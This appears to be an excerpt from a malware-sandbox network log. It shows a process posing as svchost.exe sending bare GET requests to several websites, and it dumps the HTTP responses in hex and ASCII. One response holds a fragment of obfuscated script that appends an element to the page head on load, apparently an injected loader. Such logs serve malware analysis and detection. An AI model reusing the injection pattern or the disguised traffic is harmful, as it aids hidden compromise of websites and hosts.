                                                                                                                                                                                                                                                        Data Ascii: on Server for On Demand Loading) --> <script src="https://www.clinicasanluis.com.co/themes/damosfrontend/revolution/js/extensions/revolution-plugin.js"></script> ... REVOLUTION SLIDER SCRIPT FILES --> <script src="https://www.clinicasanluis.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3142INData Raw: 27 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6c 69 64 65 44 6f 77 6e 28 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 64 65 6c 61 79 28 34 30 30 30 30 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6c 69 64 65 55 70 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 74 68 69 73 29 2e 68 74 6d 6c 28 22 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d
                                                                                                                                                                                                                                                        Data Ascii: ') .slideDown() .delay(40000) .slideUp(function() { $(this).html(""); }
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3146INData Raw: 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 5f 30 78 6a 29 3b 7d 7d 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 20 21 3d 3d 20 27 6c 6f 61 64 69 6e 67 27 29 20 7b 68 61 6e 64 6c 65 72 28 29 3b 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 68 61 6e 64 6c 65 72 29 3b 7d 20 65 6c 73 65 20 7b 76 61 72 20 70 72 65 76 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 7d 3b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74
                                                                                                                                                                                                                                                        Data Ascii: head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadyst
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3147INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        18192.168.2.359413172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2859OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: orlyhotel.com


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        19192.168.2.359336185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:08 UTC2866OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2867INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:09 GMT
                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                        X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2867INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        2192.168.2.349998185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:50:54 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC7INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:50:55 GMT
                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                        X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC8INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        20192.168.2.35937849.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2866OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2868INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 2599435
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Thu, 21 Sep 2023 05:40:29 GMT
                                                                                                                                                                                                                                                        ETag: "27aa0b-605d7ee086c61"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2869INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2884INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                        Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3037INData Raw: 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f
                                                                                                                                                                                                                                                        Data Ascii: 2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3053INData Raw: 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: "M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3069INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: s="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3179INData Raw: 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32
                                                                                                                                                                                                                                                        Data Ascii: .86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3195INData Raw: 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3211INData Raw: 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 5,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3227INData Raw: 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37
                                                                                                                                                                                                                                                        Data Ascii: 41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.7
